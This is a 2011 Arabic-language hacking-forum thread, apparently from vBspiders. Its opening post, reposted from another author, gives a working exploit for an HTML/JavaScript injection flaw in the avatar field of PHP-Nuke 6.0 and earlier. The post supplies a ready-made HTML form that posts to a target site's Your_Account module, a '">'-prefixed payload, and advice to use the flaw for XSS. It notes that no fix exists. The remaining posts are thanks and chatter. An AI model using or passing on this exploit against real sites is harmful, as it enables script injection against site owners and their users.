التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام


قديم 01-31-2011, 07:21 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
ReD-HaT
زائـــر
 
الصورة الرمزية ReD-HaT
 

 

 
إحصائية العضو




 

 

.... ثغرة في php nuke


السلام عليكم و رحمة الله تعالى و بركاته
على العموم فقط هدا الموضوع منقول لكن لنظر اهميته حبيت اجيباكم ياه
باسم الله:
فيه ثغره في ال php nuke حبيت اقولكم عليها ..الثغره دي تتيح لك تنفيذ اكواد الهتمل و الجافا بدل مكان الصوره الشخصيه .......

انا عارف انكم اول ما تقروا السطر الاول اكيد اغلبكم حيشتمني باكثر الالفاظ اباحه - بس عادي انا متعود - و يقول ايه ده باه هو مدخلنا هنا عشان يقولنا تنفيذ اكواد هتمل و جافا بدل الصوره الشخصيه ؟؟؟!!!! بس ؟؟؟!!! اما عبيط اوي !!!

لكن في اخر الموضوع حقولكم ممكن تعملوا بيها ايه .....

المهم ان الثغره كالتالي : ( ساحاول اني اعمل زي مواقع السيكيوريتي المحترمه لم تيجي تعرض ثغره )

الاصدارات المصابه :

PHP nuke versionh 6.0 و الاقل منها

الاستخدام :

تستخدم كما قلت في تنفيذ اكواد الهتمل و الجافا سكريبت من خلال مكان صورهم الشخصيه.

ملخص عام للثغره:

اي مستخدم عندم يقوم بالتسجيل في المجله فانه يطالب باختيار صوره شخصيه و ذلك من خلال مجموعه من الصور الموجوده في المجلد هذا /images/forum/avatars ....

عندئذ تقوم المجله بوضع اسم الصوره في الداتا بيز .. و لكنها لا تقوم بوضع اي كود اي انه اذا استطاع اي يوزر ان يحصل على كود فورم المجله و استطاع ان يغير صندوق اختيار الصوره الشخصيه الى صندوق text عادي ..اذن اعتقد انه ممكن ان يكتب كود الهتمل اللي هوه عايزه !!!!

الاكسبلويت:

اولا عليك ن تقوم بالتسجيل في المجله و الدخول بعد ذلك و الذهاب الى صفحه Your Account و منها الذهاب الى صفحه Your Info بعد ذلك عليك باظهار سورس كود الصفحه من خلال view source و البحث عن كلمه uid

لازم تلاقي حاجه زي كده :

<input type="hidden" name="uid" value="2111">


كده يبقى انت عرفت رقم الاي دي اللي هوه في المثال كان 2111 ...

عليك بعد ذلك نك تحفظ الكود ده في النوت باد و تسميه اي اسم بامتداد html مع ملاحظه تغيير http://nukesite/ الى عنوان المجله الهدف ......:

<!-- START CODE --!>
<form name="Register"
action="http://NUKEDSITE/modules.php?name=Your_Account" method="post">


<b>Code ('">[code]<b ')</b><input type="text"
name="user_avatar" size="30"
maxlength="30"><br><br>


<b>Username</b><input type="text" name="uname" size="30"

maxlength="255"><br><b>User ID:<input type="text"
name="uid"
size="30"><input type="hidden" name="op"
value="saveuser"><input
type="submit" value="Save Changes"></form>
<!-- END CODE --!>

و الان عليك تشغيل ملف الhtml هذا .. اول خانه عليك كتابه الكود المطلووب تنفيذه مع مراعاه انه يجب ن يبدأ بالعلامه :

">

و ممكن ينتهي بالعلامه

<b

حتى لا تجد اي مشاكل في الكود عند العرض ...ضع بعد كده اسم اليوزر و رقم الاي دي و بعدين submit سوف تجد نفسك في صفحه Your Account الخاصه بك ..و كده الكود تم تشغيله !!!!

مثال للي ممكن تكتبه مثلا :

"><h1>TESTING</h1><b

طبعا ده حيطبع الكلمه TESTING مكان صورتك الشخصيه ....!!

خلي بالك ان فيه مسافه بعد العلامه

"<b

خلي بالك منها والا سوف تجد بروكين كود ..

اقصى حد للكود اللي ممكن انك تشغله هو 30 كراكتر ....

اللي انا كنت عايز اقوله انك ممكن تنفذ ثغرات xss او اي حاجه انت مش عارف تنفذها بسبب اغلاق كود الهتمل اياه =) لمزيد من المعلومات راجع الدرس هذا كمثال ليس اكثر ؟؟

الحل :

لسه و الله !!!!

و السلام عليكم و رحمه الله و بركاته...
[align=center]الكاتب: ياسر / الناقل : جوووووكر smilies8smilies8smilies8[/align]


eyvm td php nuke

   

رد مع اقتباس
قديم 01-31-2011, 09:29 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
ReD-HaT
زائـــر
 
الصورة الرمزية ReD-HaT
 

 

 
إحصائية العضو




 

 

افتراضي


[align=center]ممممم ما فيش ردووود الاسف[/align]

   

رد مع اقتباس
قديم 02-01-2011, 01:39 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
Hαcĸer'ѕ Kιɴɢ
:: Interactive Developer ::
 
الصورة الرمزية Hαcĸer'ѕ Kιɴɢ
 

 

 
إحصائية العضو








Hαcĸer'ѕ Kιɴɢ غير متواجد حالياً

إرسال رسالة عبر MSN إلى Hαcĸer'ѕ Kιɴɢ

 

 

إحصائية الترشيح

عدد النقاط : 10
Hαcĸer'ѕ Kιɴɢ is on a distinguished road

افتراضي


السلام عليكم
بارك الله فيك يا جوكر
واصل ابداعاتك و لك احلى تقييم

التوقيع

** إن مرت الايام ولم تروني فهذه مشاركاتي فـتذكروني

وان غبت ولم تجدوني اكون وقتها بحاجه للدعاء فادعولي **

 

   

رد مع اقتباس
قديم 02-01-2011, 01:55 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية NeTCaT-Ma
 

 

 
إحصائية العضو








NeTCaT-Ma غير متواجد حالياً

إرسال رسالة عبر MSN إلى NeTCaT-Ma

 

 

إحصائية الترشيح

عدد النقاط : 10
NeTCaT-Ma is on a distinguished road

افتراضي


شكرا لك جوكر على النقل
aji akma katan9al hta fal 9issam <<<<< 3a9t bik
l3az wald bladi

التوقيع

mode : off
I Will Be Back Soon
القرآن الكريم

 

   

رد مع اقتباس
قديم 02-01-2011, 01:55 AM   رقم المشاركة : 5 (permalink)
معلومات العضو
ReD-HaT
زائـــر
 
الصورة الرمزية ReD-HaT
 

 

 
إحصائية العضو




 

 

افتراضي


[align=center]شكراااا اخي الغالي[/align]

   

رد مع اقتباس
قديم 02-01-2011, 02:36 AM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية PRO-MAN
 

 

 
إحصائية العضو








PRO-MAN غير متواجد حالياً

إرسال رسالة عبر MSN إلى PRO-MAN إرسال رسالة عبر Skype إلى PRO-MAN

 

 

إحصائية الترشيح

عدد النقاط : 10
PRO-MAN is on a distinguished road

افتراضي


السلام عليكم
بارك الله فيك يا جوكر

التوقيع

[SIGPIC][/SIGPIC]

 

   

رد مع اقتباس
قديم 02-01-2011, 02:53 AM   رقم المشاركة : 7 (permalink)
معلومات العضو
ReD-HaT
زائـــر
 
الصورة الرمزية ReD-HaT
 

 

 
إحصائية العضو




 

 

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Mr-Ip
شكرا لك جوكر على النقل
aji akma katan9al hta fal 9issam <<<<< 3a9t bik
l3az wald bladi

hhhhhhh b7al ila 3almak lah makayn rir ta7nach o l qit f lwadnin hhhhh
smilies8smilies8smilies8

   

رد مع اقتباس
قديم 02-01-2011, 03:12 AM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية loulou
 

 

 
إحصائية العضو







loulou غير متواجد حالياً

إرسال رسالة عبر MSN إلى loulou إرسال رسالة عبر Skype إلى loulou

 

 

إحصائية الترشيح

عدد النقاط : 10
loulou is on a distinguished road

افتراضي


يعطيك العافية اخي الكريم joker-x

الله يجعلها في ميزان حسناتك

واضل ابداعك يا بطل و لا تحرمنا من مواضيعك الجميلة

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 04:37 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0